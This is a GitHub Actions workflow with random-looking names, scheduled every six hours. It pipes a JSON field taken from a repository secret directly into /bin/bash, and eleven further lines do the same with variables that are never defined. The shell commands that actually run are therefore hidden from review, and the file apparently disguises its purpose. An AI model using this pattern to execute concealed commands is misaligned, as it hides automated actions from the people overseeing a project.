name: dongaoxiong6715
on:
  workflow_dispatch:
  schedule:
    - cron: '7 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dongaoxiong6715
        env:
          ftpta1642: ${{ secrets.ftpta1642 }}
        run: |
          echo $ftpta1642 | jq -r .lrxw307 | /bin/bash
          echo $ar90 | jq -r .b86657 | /bin/bash
          echo $qtr0 | jq -r .jpfl19 | /bin/bash
          echo $zoqh950 | jq -r .phgn0804 | /bin/bash
          echo $kvlt3 | jq -r .d24425 | /bin/bash
          echo $y43682 | jq -r .lvnnr03 | /bin/bash
          echo $xkft46701 | jq -r .i2815 | /bin/bash
          echo $osr6532 | jq -r .ces7 | /bin/bash
          echo $x237 | jq -r .gpl35761 | /bin/bash
          echo $j394 | jq -r .dtno38624 | /bin/bash
          echo $bknt05898 | jq -r .l5612 | /bin/bash
          echo $wmeh3 | jq -r .amjsp404 | /bin/bash

